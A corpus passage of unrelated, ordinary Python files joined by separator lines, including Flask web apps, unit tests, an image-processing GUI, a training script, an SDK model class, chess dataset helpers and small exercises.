from .Headers import Headers
from .Query import Query

# Re-bind the imported classes to module attributes; the self-assignments
# make the re-export explicit and keep linters from flagging the imports
# as unused.
Body = Body
Headers = Headers
Query = Query
|
nilq/baby-python
|
python
|
import math
from urllib.parse import unquote
from elasticsearch import Elasticsearch
from flask import Flask, render_template, request, url_for
app = Flask(__name__)
es = Elasticsearch()
@app.route("/", methods=["GET"])
def index():
    """Handle a search request and render one page of results.

    Query-string parameters:
        q: free text, optionally containing ``key:value`` filter terms
           (a leading ``!`` on the key excludes; a leading ``=`` on the
           value requires an exact match)
        p: 1-based page number
        s: minimum star count
        o: maximum operation count
    """
    def parse_filter(term):
        # Split "key:value" on the first colon only, so values may contain ':'.
        key, value = term[:term.index(":")], term[term.index(":") + 1:]
        exclude = key.startswith("!")
        exact = value.startswith("=")
        # int(bool) slices off the marker character when present.
        return key[int(exclude):], value[int(exact):], exclude, exact
    page = max(1, request.args.get("p", 1, type=int))
    min_stars = max(0, request.args.get("s", 0, type=int))
    max_ops = max(0, request.args.get("o", 1000, type=int))
    terms = unquote(request.args.get("q", "", type=str)).split()
    # Extract free text query and filters (filters with empty values are dropped).
    filters, free_text_query = [], []
    for term in terms:
        if ":" in term:
            parsed_filter = parse_filter(term)
            if len(parsed_filter[1]) > 0:
                filters.append(parsed_filter)
            continue
        free_text_query.append(term)
    free_text_query = " ".join(free_text_query)
    # Create query and search (10 results per page).
    query, applied_filters = create_query(free_text_query, filters, min_stars, max_ops)
    results = es.search(body={"query": query}, from_=(page - 1) * 10, size=10)
    # Parse results and build pagination links.
    num_pages = math.ceil(results["hits"]["total"]["value"] / 10)
    parsed_results = list(map(lambda result: result["_source"], results["hits"]["hits"]))
    prev_page_url = url_for("index", q=request.args.get("q"), p=max(page - 1, 1), s=min_stars, o=max_ops)
    # BUG FIX: removed the stray "_url =" chained assignment that created a
    # useless extra local variable.
    next_page_url = url_for("index", q=request.args.get("q"), p=min(page + 1, num_pages), s=min_stars, o=max_ops)
    first_page_url = url_for("index", q=request.args.get("q"), p=1, s=min_stars, o=max_ops)
    return render_template("index.html", query=free_text_query, filters=applied_filters, results=parsed_results,
                           prev=prev_page_url, next=next_page_url, first=first_page_url, page=page, num_pages=num_pages,
                           min_stars=min_stars, max_ops=max_ops)
def create_query(free_text_query, filters, min_stars, max_ops):
    """Build the Elasticsearch ``function_score`` query for a search.

    Args:
        free_text_query: the free-text part of the search.
        filters: iterable of ``(field, value, exclude, exact)`` tuples.
        min_stars: minimum ``star_count`` to accept.
        max_ops: maximum ``num_operations`` to accept.

    Returns:
        A ``(query, applied_filters)`` tuple where ``applied_filters`` is a
        list of dicts describing each filter that was applied.
    """
    bool_query = {
        "must": [{"multi_match": {
            "query": free_text_query,
            "fields": ["name^5", "search_name^5", "docstring^4", "arguments^3", "returns^2", "keywords"]
        }}],
        "filter": [{"range": {"star_count": {"gte": min_stars}}},
                   {"range": {"num_operations": {"lte": max_ops}}}],
        "must_not": []
    }
    query = {
        "function_score": {
            "query": {"bool": bool_query},
            # Re-score by popularity (stars) discounted by implementation size.
            "script_score": {
                "script": {
                    "source": "_score * Math.max(0.1, Math.log(1 + doc['star_count'].value) - 0.2 * Math.log(1 + doc['num_operations'].value))"
                }
            },
            "boost_mode": "replace"
        }
    }
    applied_filters = []
    for field, value, exclude, exact in filters:
        if exact:
            clause = {"term": {f"{field}.keyword": {"value": value}}}
        else:
            clause = {"wildcard": {f"{field}": {"value": f"*{value}*"}}}
        # Exclusions go to must_not; inclusions join the filter clauses.
        bucket = "must_not" if exclude else "filter"
        bool_query[bucket].append(clause)
        applied_filters.append({"key": field, "value": value, "exclude": exclude, "exact": exact})
    return query, applied_filters
if __name__ == "__main__":
    # Development entry point; use a proper WSGI server in production.
    app.run()
|
nilq/baby-python
|
python
|
"""This module contains handler functions that should be run before each application request."""
from logging import getLogger, Logger
from flask import request
log: Logger = getLogger(__name__)
def log_incoming_request() -> None:
    """Fully log the incoming request (method, path, origin) for debugging."""
    # Security note: X-Forwarded-For is client-controlled and spoofable, see:
    # http://esd.io/blog/flask-apps-heroku-real-ip-spoofing.html
    forwarded_values = request.headers.getlist("X-Forwarded-For")
    first_forwarded = forwarded_values[0] if forwarded_values else None
    # Fall back to the socket address when the header is absent or empty.
    request_origin = first_forwarded or request.remote_addr
    log.debug("Received %s request for path '%s' from %s", request.method, request.path, request_origin)
|
nilq/baby-python
|
python
|
#!/usr/bin/env python
import app_config
import json
import unittest
from admin import *
from fabfile import data
from models import models
from peewee import *
class FilterResultsTestCase(unittest.TestCase):
    """
    Testing filtering for state-level results
    """
    def setUp(self):
        # Reload results and call records so every test starts from a clean slate.
        data.load_results()
        data.create_calls()
    def test_results_filtering(self):
        # 185 appears to be the expected number of state-level rows in the
        # fixture data — TODO confirm against the loaded results file.
        filtered = utils.filter_results()
        self.assertEqual(filtered.count(), 185)
    def test_results_grouping(self):
        # Grouping the filtered rows should yield one entry per race
        # (22 races in the fixture data — TODO confirm).
        filtered = utils.filter_results()
        grouped = utils.group_results_by_race(filtered)
        self.assertEqual(len(grouped), 22)
class CallRacesTestCase(unittest.TestCase):
    """
    Testing race calling logic
    """
    def setUp(self):
        # Fresh results/calls plus a Flask test client for each test.
        data.load_results()
        data.create_calls()
        self.test_app = admin.app.test_client()
    def send_ap_post(self):
        """POST an 'accept AP' call for race 12044; return its state-level results."""
        # NOTE(review): the response object is unused — success is asserted
        # indirectly through the result rows queried below.
        response = self.test_app.post(
            '/%s/calls/accept-ap' % app_config.PROJECT_SLUG,
            data={
                'race_id': '12044'
            }
        )
        results = models.Result.select().where(
            models.Result.level == 'state',
            models.Result.raceid == '12044'
        )
        return results
    def send_npr_post(self):
        """POST an NPR call for one result; return (that result, all race results)."""
        response = self.test_app.post(
            '/%s/calls/call-npr' % app_config.PROJECT_SLUG,
            data={
                'race_id': '12044',
                'result_id': '12044-polid-1746-state-1'
            }
        )
        result = models.Result.get(models.Result.id == '12044-polid-1746-state-1')
        race_results = models.Result.select().where(
            models.Result.level == 'state',
            models.Result.raceid == '12044'
        )
        return result, race_results
    def test_accepting_ap(self):
        # Accepting the AP call must flag every state-level result of the race.
        true_results = self.send_ap_post()
        for result in true_results:
            self.assertTrue(result.call[0].accept_ap)
    def test_calling_npr(self):
        # An NPR override marks the chosen result as winner and clears AP
        # acceptance on every result of the race.
        called_result, race_results = self.send_npr_post()
        self.assertTrue(called_result.call[0].override_winner)
        for result in race_results:
            self.assertFalse(result.call[0].accept_ap)
if __name__ == '__main__':
    # Run every test case in this module when executed directly.
    unittest.main()
|
nilq/baby-python
|
python
|
from __future__ import unicode_literals
from django.test import TestCase
from .factories import ServiceTicketFactory
from .utils import parse
from mama_cas.request import SingleSignOutRequest
class SingleSignOutRequestTests(TestCase):
    """
    Test the ``SingleSignOutRequest`` SAML output.
    """
    def setUp(self):
        # A single service ticket is enough for every test in this class.
        self.st = ServiceTicketFactory()
    def test_sso_request(self):
        """
        A ``SingleSignOutRequest`` should contain the ticket string
        from the provided context.
        """
        content = SingleSignOutRequest(context={'ticket': self.st}).render_content()
        # The rendered SAML body must carry the ticket inside <SessionIndex>.
        session_index = parse(content).find('./SessionIndex')
        self.assertIsNotNone(session_index)
        self.assertEqual(session_index.text, self.st.ticket)
|
nilq/baby-python
|
python
|
#!/usr/bin/env python3
import os
import signal
import sys
import time
import json
from flask import Flask, render_template
app = Flask(__name__)
def signal_handler(signum, frame):
    """Exit the process cleanly when SIGTERM/SIGINT is received.

    Args:
        signum: the received signal number (renamed from ``signal``, which
            shadowed the imported ``signal`` module inside the handler).
        frame: the current stack frame at delivery time (unused).
    """
    sys.exit(0)
# Install the clean-exit handler for both termination signals.
signal.signal(signal.SIGTERM, signal_handler)
signal.signal(signal.SIGINT, signal_handler)
def get_directory_paths():
    ''' Establish paths to dependencies.

    When SENZING_PROJECT_DIR is set, every path is derived from it;
    otherwise each directory can be overridden individually via its own
    environment variable, falling back to the standard install locations.
    '''
    project_dir = os.environ.get("SENZING_PROJECT_DIR", None)
    if project_dir:
        return {
            "dataDir": "{0}/data".format(project_dir),
            "etcDir": "{0}/etc".format(project_dir),
            "g2Dir": "{0}/g2".format(project_dir),
            "varDir": "{0}/var".format(project_dir)
        }
    return {
        "dataDir": os.environ.get("SENZING_DATA_DIR", "/opt/senzing/data"),
        "etcDir": os.environ.get("SENZING_ETC_DIR", "/etc/opt/senzing"),
        "g2Dir": os.environ.get("SENZING_G2_DIR", "/opt/senzing/g2"),
        "varDir": os.environ.get("SENZING_VAR_DIR", "/var/opt/senzing")
    }
# Add python directory to System Path so the Senzing SDK modules resolve.
directory_paths = get_directory_paths()
print(directory_paths)
sys.path.append("{0}/python".format(directory_paths.get('g2Dir')))
# Import Senzing Engine.
try:
    from G2Engine import G2Engine
    from G2Audit import G2Audit
    from G2Product import G2Product
except:
    # NOTE(review): bare except also swallows non-import failures; consider
    # narrowing to ImportError.
    print("ERROR: Could not import G2Engine, G2Audit, G2Product")
    print("Ctrl-C to exit")
    # Keep the process alive so an operator (or container log reader) can
    # see the error before exit.
    time.sleep(3600)
    sys.exit(0)
# -----------------------------------------------------------------------------
# Senzing configuration.
# -----------------------------------------------------------------------------
def get_g2_configuration_dictionary():
    ''' Construct a dictionary in the form of the old ini files.

    Paths come from get_directory_paths(); each entry may be overridden
    by its SENZING_* environment variable.
    '''
    paths = get_directory_paths()
    # Special case: Temporary work-around for /opt/senzing/data/1.0.0 —
    # prefer the versioned data directory when it exists.
    support_path = paths.get('dataDir')
    versioned_path = "{0}/1.0.0".format(support_path)
    if os.path.exists(versioned_path):
        support_path = versioned_path
    return {
        "PIPELINE": {
            "CONFIGPATH": os.environ.get("SENZING_CONFIG_PATH", paths.get('etcDir')),
            "RESOURCEPATH": os.environ.get("SENZING_RESOURCE_PATH", "{0}/resources".format(paths.get('g2Dir'))),
            "SUPPORTPATH": os.environ.get("SENZING_SUPPORT_PATH", support_path),
        },
        "SQL": {
            "CONNECTION": os.environ.get("SENZING_DATABASE_URL", "sqlite3://na:na@{0}/sqlite/G2C.db".format(paths.get('varDir'))),
        }
    }
def get_g2_configuration_json():
    ''' Transform the configuration dictionary to a JSON string. '''
    configuration = get_g2_configuration_dictionary()
    return json.dumps(configuration)
# -----------------------------------------------------------------------------
# Initialization
# -----------------------------------------------------------------------------
g2_configuration_json = get_g2_configuration_json()
verbose_logging = False
# Empty config id — presumably selects the engine's default configuration;
# TODO confirm against the G2Engine.exportConfig contract.
config_id = bytearray([])
# Initialize Senzing G2 modules (engine, audit, product) with the same config.
g2_engine = G2Engine()
g2_engine.initV2('pyG2', g2_configuration_json, verbose_logging)
g2_audit = G2Audit()
g2_audit.initV2('pyG2Audit', g2_configuration_json, verbose_logging)
g2_product = G2Product()
g2_product.initV2('pyG2Product', g2_configuration_json, verbose_logging)
# -----------------------------------------------------------------------------
# @app.routes
# -----------------------------------------------------------------------------
@app.route("/")
def app_root():
    """Render the home page with version, license, config and audit summary."""
    def pretty(raw_json):
        # Parse then re-serialize for stable, human-readable display.
        return json.dumps(json.loads(raw_json), sort_keys=True, indent=4)

    # Version and license come straight from the product module.
    version = pretty(g2_product.version())
    license_text = pretty(g2_product.license())

    # Engine configuration is written into a caller-supplied buffer.
    config_buffer = bytearray()
    g2_engine.exportConfig(config_buffer, config_id)
    config = pretty(config_buffer)

    # Audit summary uses the same buffer-filling calling convention.
    summary_buffer = bytearray()
    g2_audit.getSummaryDataDirect(summary_buffer)
    summary = pretty(summary_buffer)

    return render_template("index.html", version=version, config=config, summary=summary, license=license_text)
# -----------------------------------------------------------------------------
# Main
# -----------------------------------------------------------------------------
if __name__ == '__main__':
    # Development entry point; use a proper WSGI server in production.
    app.run()
|
nilq/baby-python
|
python
|
import tkinter
import tkinter.filedialog
from PIL import Image,ImageTk
from torchvision import transforms as transforms
from test import main,model
# Build the main UI window.
win = tkinter.Tk()
win.title("picture process")
win.geometry("1280x1080")
# Declare globals shared between the button callbacks.
original = Image.new('RGB', (300, 400))
save_img = Image.new('RGB', (300, 400))
count = 0
e2 = None
# NOTE(review): this turns e2 into the literal string "None" — confirm intended.
e2 = str(e2)
file_name = None
img2 = tkinter.Label(win)
def choose_file():
    '''Pick an image file, remember its path, and display it on the left.'''
    select_file = tkinter.filedialog.askopenfilename(title='select the picture')
    global file_name
    file_name=select_file
    e.set(select_file)
    load = Image.open(select_file)
    load = transforms.Resize((400,400))(load)
    # Keep the loaded picture in the module-level `original`.
    global original
    original = load
    render = ImageTk.PhotoImage(load)
    img = tkinter.Label(win,image=render)
    img.image = render  # keep a reference so the PhotoImage is not garbage-collected
    img.place(x=100,y=100)
def coloring():
    '''Run the generator model and show the produced image on the right.'''
    model()
    new_img = Image.open('generate.png')
    new_img = transforms.Resize((400,400))(new_img)
    render = ImageTk.PhotoImage(new_img)
    # Replace the previous right-hand label with the new rendering.
    global img2
    img2.destroy()
    img2 = tkinter.Label(win,image=render)
    img2.image = render  # keep a reference so the PhotoImage is not garbage-collected
    img2.place(x=800,y=100)
def transfer():
    '''Run edge detection on the chosen file, then the model, and show the result.'''
    main(file_name)
    model()
    new_img = Image.open('generate.png')
    new_img = transforms.Resize((400,400))(new_img)
    render = ImageTk.PhotoImage(new_img)
    # Replace the previous right-hand label with the new rendering.
    global img2
    img2.destroy()
    img2 = tkinter.Label(win,image=render)
    img2.image = render  # keep a reference so the PhotoImage is not garbage-collected
    img2.place(x=800,y=100)
def edge_detect():
    '''Run edge detection on the chosen file and show the detected edges.'''
    main(file_name)
    new_img = Image.open('canny&HED.jpg')
    new_img = transforms.Resize((400,400))(new_img)
    render = ImageTk.PhotoImage(new_img)
    # Replace the previous right-hand label with the new rendering.
    global img2
    img2.destroy()
    img2 = tkinter.Label(win,image=render)
    img2.image = render  # keep a reference so the PhotoImage is not garbage-collected
    img2.place(x=800,y=100)
# Entry showing the currently selected file path.
e = tkinter.StringVar()
e_entry = tkinter.Entry(win, width=68, textvariable=e)
e_entry.pack()
# File-selection button.
button1 = tkinter.Button(win, text ="Select", command = choose_file)
button1.pack()
button2 = tkinter.Button(win, text="edge detect" , command = edge_detect,width=20,height =1)
button2.place(x=570,y=200)
button3 = tkinter.Button(win, text="coloring" , command = coloring,width=20,height =1)
button3.place(x=570,y=300)
button4 = tkinter.Button(win, text="style transfer" , command = transfer,width=20,height =1)
button4.place(x=570,y=400)
label1 = tkinter.Label(win,text="Original Picture")
label1.place(x=250,y=50)
label2 = tkinter.Label(win,text="style transfer!")
label2.place(x=950,y=50)
# Exit button.
button0 = tkinter.Button(win,text="Exit",command=win.quit,width=20,height =1)
button0.place(x=570,y=650)
win.mainloop()
|
nilq/baby-python
|
python
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright 2015 RAPP
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Authors: Konstantinos Panayiotou, Manos Tsardoulias
# contact: klpanagi@gmail.com, etsardou@iti.gr
## @file RandStrGen/RandStrGen.py
#
# @copyright Rapp Projecty EU 2015
# @author Konstantinos Panayiotou, [klpanagi@gmail.com]
#
import random
import string
class RandStrGen:
    """ Random String Generator static class (Namespace).

    Produces cryptographically random alphanumeric strings.
    """
    @staticmethod
    def create(size):
        """! Generate a new random string.

        @param size int - Number of characters for the random string to generate
        """
        alphabet = string.ascii_uppercase + string.ascii_lowercase + string.digits
        # SystemRandom draws from os.urandom, so results are not reproducible
        # but are suitable for security-sensitive identifiers.
        rng = random.SystemRandom()
        return ''.join(rng.choice(alphabet) for _ in range(size))
|
nilq/baby-python
|
python
|
# Train FSDKaggle2018 model
#
import sys
sys.path.append('../..')
from lib_train import *
# Output locations for this training run.
conf.logdir = 'logs_mobilenetv2_small'
conf.best_weight_file = 'best_mobilenetv2_small_weight.h5'
# 1. Load Meta data for the FSDKaggle2018 competition.
DATAROOT = Path.home() / '.kaggle/competitions/freesound-audio-tagging'
# Data frame for training dataset (one row per audio file with its label).
df_train = pd.read_csv(DATAROOT / 'train.csv')
# Plain y_train label: integer-encoded labels in train.csv row order.
plain_y_train = np.array([conf.label2int[l] for l in df_train.label])
# 2. Preprocess data if it's not ready
def fsdkaggle2018_map_y_train(idx_train, plain_y_train):
    """Gather the labels at the given sample indices into a numpy array."""
    selected_labels = [plain_y_train[index] for index in idx_train]
    return np.array(selected_labels)
def fsdkaggle2018_make_preprocessed_train_data():
    """Create and cache the preprocessed train/validation arrays on disk.

    Only runs the (expensive) preprocessing when ``conf.X_train`` is not
    already present: builds multiplexed mel-spectrograms from the raw audio
    referenced by ``df_train``, splits them into train/validation sets and
    saves the four arrays as .npy files.
    """
    conf.folder.mkdir(parents=True, exist_ok=True)
    if not os.path.exists(conf.X_train):
        XX = mels_build_multiplexed_X(conf, [DATAROOT/'audio_train'/fname for fname in df_train.fname])
        X_train, y_train, X_test, y_test = \
            train_valid_split_multiplexed(conf, XX, plain_y_train, demux=True)
        np.save(conf.X_train, X_train)
        np.save(conf.y_train, y_train)
        np.save(conf.X_test, X_test)
        np.save(conf.y_test, y_test)
fsdkaggle2018_make_preprocessed_train_data()
# 3. Load all dataset & normalize.
X_train, y_train = load_audio_datafiles(conf, conf.X_train, conf.y_train, normalize=True)
X_test, y_test = load_audio_datafiles(conf, conf.X_test, conf.y_test, normalize=True)
print('Loaded train:test = {}:{} samples.'.format(len(X_train), len(X_test)))
# 4. Train folds (single fold 0, model built from scratch).
history, model, plain_datagen = train_model(conf, fold=0,
                                            dataset=[X_train, y_train, X_test, y_test],
                                            model=None,
                                            init_weights=None, # from scratch
                                            #init_weights='../../model/mobilenetv2_small_fsd2018_41cls.h5'
                                            )
# 5. Evaluate on the held-out split.
evaluate_model(conf, model, X_test, y_test)
print('___ training finished ___')
|
nilq/baby-python
|
python
|
"""
GFS2FileSystemBlockSize - command ``stat -fc %s <mount_point_path>``
====================================================================
The parser parse the output of ``stat -fc %s <mount_point_path>``
"""
from insights import parser, CommandParser
from insights.specs import Specs
from insights.parsers import SkipException
@parser(Specs.gfs2_file_system_block_size)
class GFS2FileSystemBlockSize(CommandParser):
    """
    Parse the output of the ``stat -fc %s <mount_point_path>`` command.

    The command prints a single line containing the file-system block size,
    which this parser exposes through the ``block_size`` attribute.

    Typical output of command ``stat -fc %s <mount_point_path>`` looks like::

        4096

    Examples::

        >>> type(gfs2_mp)
        <class 'insights.parsers.gfs2_file_system_block_size.GFS2FileSystemBlockSize'>
        >>> gfs2_mp.block_size
        4096

    Raise::

        SkipException: When the content isn't in the expected format.

    Attributes::

        block_size (int): The block size of the gfs2 file system.
    """
    def parse_content(self, content):
        """Store the block size, skipping anything but a single integer line."""
        # Guard clause: reject anything other than exactly one all-digit line.
        if len(content) != 1 or not content[0].isdigit():
            raise SkipException('The output is invalid.')
        self.block_size = int(content[0])
|
nilq/baby-python
|
python
|
# coding: utf-8
# Copyright (c) 2016, 2021, Oracle and/or its affiliates. All rights reserved.
# This software is dual-licensed to you under the Universal Permissive License (UPL) 1.0 as shown at https://oss.oracle.com/licenses/upl or Apache License 2.0 as shown at http://www.apache.org/licenses/LICENSE-2.0. You may choose either license.
from .operator import Operator
from oci.util import formatted_flat_dict, NONE_SENTINEL, value_allowed_none_or_none_sentinel # noqa: F401
from oci.decorators import init_model_state_from_kwargs
@init_model_state_from_kwargs
class Joiner(Operator):
    """
    The information about a joiner object.
    """
    #: A constant which can be used with the join_type property of a Joiner.
    #: This constant has a value of "INNER"
    JOIN_TYPE_INNER = "INNER"
    #: A constant which can be used with the join_type property of a Joiner.
    #: This constant has a value of "FULL"
    JOIN_TYPE_FULL = "FULL"
    #: A constant which can be used with the join_type property of a Joiner.
    #: This constant has a value of "LEFT"
    JOIN_TYPE_LEFT = "LEFT"
    #: A constant which can be used with the join_type property of a Joiner.
    #: This constant has a value of "RIGHT"
    JOIN_TYPE_RIGHT = "RIGHT"
    def __init__(self, **kwargs):
        """
        Initializes a new Joiner object with values from keyword arguments. The default value of the :py:attr:`~oci.data_integration.models.Joiner.model_type` attribute
        of this class is ``JOINER_OPERATOR`` and it should not be changed.
        The following keyword arguments are supported (corresponding to the getters/setters of this class):

        :param model_type:
            The value to assign to the model_type property of this Joiner.
            Allowed values for this property are: "SOURCE_OPERATOR", "FILTER_OPERATOR", "JOINER_OPERATOR", "AGGREGATOR_OPERATOR", "PROJECTION_OPERATOR", "TARGET_OPERATOR", "DISTINCT_OPERATOR", "SORT_OPERATOR", "UNION_OPERATOR", "INTERSECT_OPERATOR", "MINUS_OPERATOR", "MERGE_OPERATOR", "START_OPERATOR", "END_OPERATOR", "PIPELINE_OPERATOR", "TASK_OPERATOR", "EXPRESSION_OPERATOR", "LOOKUP_OPERATOR", 'UNKNOWN_ENUM_VALUE'.
            Any unrecognized values returned by a service will be mapped to 'UNKNOWN_ENUM_VALUE'.
        :type model_type: str

        :param key:
            The value to assign to the key property of this Joiner.
        :type key: str

        :param model_version:
            The value to assign to the model_version property of this Joiner.
        :type model_version: str

        :param parent_ref:
            The value to assign to the parent_ref property of this Joiner.
        :type parent_ref: oci.data_integration.models.ParentReference

        :param name:
            The value to assign to the name property of this Joiner.
        :type name: str

        :param description:
            The value to assign to the description property of this Joiner.
        :type description: str

        :param object_version:
            The value to assign to the object_version property of this Joiner.
        :type object_version: int

        :param input_ports:
            The value to assign to the input_ports property of this Joiner.
        :type input_ports: list[oci.data_integration.models.InputPort]

        :param output_ports:
            The value to assign to the output_ports property of this Joiner.
        :type output_ports: list[oci.data_integration.models.OutputPort]

        :param object_status:
            The value to assign to the object_status property of this Joiner.
        :type object_status: int

        :param identifier:
            The value to assign to the identifier property of this Joiner.
        :type identifier: str

        :param parameters:
            The value to assign to the parameters property of this Joiner.
        :type parameters: list[oci.data_integration.models.Parameter]

        :param op_config_values:
            The value to assign to the op_config_values property of this Joiner.
        :type op_config_values: oci.data_integration.models.ConfigValues

        :param join_type:
            The value to assign to the join_type property of this Joiner.
            Allowed values for this property are: "INNER", "FULL", "LEFT", "RIGHT", 'UNKNOWN_ENUM_VALUE'.
            Any unrecognized values returned by a service will be mapped to 'UNKNOWN_ENUM_VALUE'.
        :type join_type: str

        :param join_condition:
            The value to assign to the join_condition property of this Joiner.
        :type join_condition: oci.data_integration.models.Expression
        """
        # Declared swagger type of each attribute (used by the SDK serializer).
        self.swagger_types = {
            'model_type': 'str',
            'key': 'str',
            'model_version': 'str',
            'parent_ref': 'ParentReference',
            'name': 'str',
            'description': 'str',
            'object_version': 'int',
            'input_ports': 'list[InputPort]',
            'output_ports': 'list[OutputPort]',
            'object_status': 'int',
            'identifier': 'str',
            'parameters': 'list[Parameter]',
            'op_config_values': 'ConfigValues',
            'join_type': 'str',
            'join_condition': 'Expression'
        }
        # Maps Python attribute names to their camelCase JSON wire names.
        self.attribute_map = {
            'model_type': 'modelType',
            'key': 'key',
            'model_version': 'modelVersion',
            'parent_ref': 'parentRef',
            'name': 'name',
            'description': 'description',
            'object_version': 'objectVersion',
            'input_ports': 'inputPorts',
            'output_ports': 'outputPorts',
            'object_status': 'objectStatus',
            'identifier': 'identifier',
            'parameters': 'parameters',
            'op_config_values': 'opConfigValues',
            'join_type': 'joinType',
            'join_condition': 'joinCondition'
        }
        self._model_type = None
        self._key = None
        self._model_version = None
        self._parent_ref = None
        self._name = None
        self._description = None
        self._object_version = None
        self._input_ports = None
        self._output_ports = None
        self._object_status = None
        self._identifier = None
        self._parameters = None
        self._op_config_values = None
        self._join_type = None
        self._join_condition = None
        # Fixed discriminator for this Operator subtype; must not be changed.
        self._model_type = 'JOINER_OPERATOR'
    @property
    def join_type(self):
        """
        Gets the join_type of this Joiner.
        joinType

        Allowed values for this property are: "INNER", "FULL", "LEFT", "RIGHT", 'UNKNOWN_ENUM_VALUE'.
        Any unrecognized values returned by a service will be mapped to 'UNKNOWN_ENUM_VALUE'.

        :return: The join_type of this Joiner.
        :rtype: str
        """
        return self._join_type
    @join_type.setter
    def join_type(self, join_type):
        """
        Sets the join_type of this Joiner.
        joinType

        :param join_type: The join_type of this Joiner.
        :type: str
        """
        allowed_values = ["INNER", "FULL", "LEFT", "RIGHT"]
        # Coerce unrecognized values instead of raising so that newer service
        # enum values do not break older clients.
        if not value_allowed_none_or_none_sentinel(join_type, allowed_values):
            join_type = 'UNKNOWN_ENUM_VALUE'
        self._join_type = join_type
    @property
    def join_condition(self):
        """
        Gets the join_condition of this Joiner.

        :return: The join_condition of this Joiner.
        :rtype: oci.data_integration.models.Expression
        """
        return self._join_condition
    @join_condition.setter
    def join_condition(self, join_condition):
        """
        Sets the join_condition of this Joiner.

        :param join_condition: The join_condition of this Joiner.
        :type: oci.data_integration.models.Expression
        """
        self._join_condition = join_condition
    def __repr__(self):
        return formatted_flat_dict(self)
    def __eq__(self, other):
        # Value equality: compare the complete attribute dictionaries.
        if other is None:
            return False
        return self.__dict__ == other.__dict__
    def __ne__(self, other):
        return not self == other
|
nilq/baby-python
|
python
|
"""Methods specific to handling chess datasets.
"""
import torch
import torchvision
import typing
import logging
from enum import Enum
import numpy as np
import chess
from recap import URI, CfgNode as CN
from .transforms import build_transforms
from .datasets import Datasets
logger = logging.getLogger(__name__)
def color_name(color: chess.Color) -> str:
    """Convert a chess color to a string.

    Args:
        color (chess.Color): the color

    Returns:
        str: the string representation ("white" or "black")
    """
    names = {chess.WHITE: "white", chess.BLACK: "black"}
    return names[color]
def piece_name(piece: chess.Piece) -> str:
    """Convert a chess piece to a string.

    Args:
        piece (chess.Piece): the piece

    Returns:
        str: the "<color>_<type>" name, e.g. "white_knight"
    """
    type_name = chess.piece_name(piece.piece_type)
    return f"{color_name(piece.color)}_{type_name}"
def name_to_piece(name: str) -> chess.Piece:
    """Convert the name of a piece to an instance of :class:`chess.Piece`.

    Args:
        name (str): the "<color>_<type>" name of the piece

    Returns:
        chess.Piece: the instance of :class:`chess.Piece`
    """
    color_part, type_part = name.split("_")
    is_white = color_part == "white"
    return chess.Piece(chess.PIECE_NAMES.index(type_part), is_white)
def build_dataset(cfg: CN, mode: Datasets) -> torch.utils.data.Dataset:
    """Build a dataset from its configuration.

    Args:
        cfg (CN): the config object
        mode (Datasets): the split (important to figure out which transforms to apply)

    Returns:
        torch.utils.data.Dataset: the dataset
    """
    # Transforms depend on the split (e.g. augmentation presumably only
    # applies to training — see build_transforms).
    transform = build_transforms(cfg, mode)
    # ImageFolder expects one sub-directory per class under DATASET.PATH/<split>.
    dataset = torchvision.datasets.ImageFolder(root=URI(cfg.DATASET.PATH) / mode.value,
                                               transform=transform)
    return dataset
def build_data_loader(cfg: CN, dataset: torch.utils.data.Dataset, mode: Datasets) -> torch.utils.data.DataLoader:
    """Build a data loader for a dataset.

    Args:
        cfg (CN): the config object
        dataset (torch.utils.data.Dataset): the dataset
        mode (Datasets): the split

    Returns:
        torch.utils.data.DataLoader: the data loader
    """
    # Shuffle only train/val batches; keep test order deterministic.
    shuffle = mode in {Datasets.TRAIN, Datasets.VAL}
    return torch.utils.data.DataLoader(dataset, batch_size=cfg.DATASET.BATCH_SIZE,
                                       shuffle=shuffle, num_workers=cfg.DATASET.WORKERS)
|
nilq/baby-python
|
python
|
# Annual student result: repeatedly read a student's four test scores, show
# the average, then report the final status for the last student entered.
option = 'Y'
print('\033[1;32m{:=^40}\033[m'.format(' ANNUAL STUDENT RESULT '))
# BUG FIX: the original condition was `option == 'Yy'`, which a single
# upper-cased character can never equal, so the loop always ended after one
# pass regardless of the answer.
while option == 'Y':
    nome = str(input('\033[1mType your name: '))
    pretty_name = nome.lower().capitalize()
    n1 = float(input('\033[1;33m{}\033[m \033[1;32mType your first note:\033[m '.format(pretty_name)))
    n2 = float(input('\033[1;33m{}\033[m \033[1;32mEnter your second note:\033[m '.format(pretty_name)))
    # BUG FIX: prompts for the third and fourth notes wrongly said "second".
    n3 = float(input('\033[1;33m{}\033[m \033[1;32mEnter your third note:\033[m '.format(pretty_name)))
    n4 = float(input('\033[1;33m{}\033[m \033[1;32mEnter your fourth note:\033[m '.format(pretty_name)))
    average = (n1 + n2 + n3 + n4) / 4
    print('\033[1m{} Your average is\033[m \033[1;36m{:.1f}\033[m'.format(pretty_name, average))
    answer = str(input('\033[1mDo you wish to continue? [Yes/No]\033[m ')).upper().strip()
    # BUG FIX: indexing [0] on an empty answer raised IndexError; treat empty
    # input as "No".
    option = answer[0] if answer else 'N'
print('\033[1;32m{:=^40}\033[m'.format(' RESULT '))
# BUG FIX: the original bands (<= 4 disapproved, == 5 recovery) wrongly
# approved averages such as 4.5 or 6.0; use contiguous bands instead.
if average < 5:
    print('\033[1mYou are\033[m \033[1;31mDISAPPROVED\033[m')
elif average < 7:
    print('\033[1mYou are in\033[m \033[1;33mRECOVERY\033[m')
else:
    # BUG FIX: "AAPPROVED" typo corrected; messages unified to English.
    print('\033[1mYou are\033[m \033[1;36mAPPROVED\033[m')
print('\033[1;35mOperation completed\033[m')
|
nilq/baby-python
|
python
|
from shared.numeric import is_permutation
from shared.generators import infinite_range
def is_max_permutation(number: int, multiple: int) -> bool:
    """Return True when every product ``number * 2`` .. ``number * multiple``
    is a digit permutation of ``number`` itself."""
    candidates = (number * factor for factor in range(2, multiple + 1))
    return all(is_permutation(number, candidate) for candidate in candidates)
def permutation_multiples(multiple: int) -> int:
    """Return the smallest positive integer whose multiples up to
    ``multiple`` times are all digit permutations of it (Project Euler 52)."""
    return next(n for n in infinite_range(1) if is_max_permutation(n, multiple))
def main() -> None:
    """Entry point: print the answer for six consecutive multiples."""
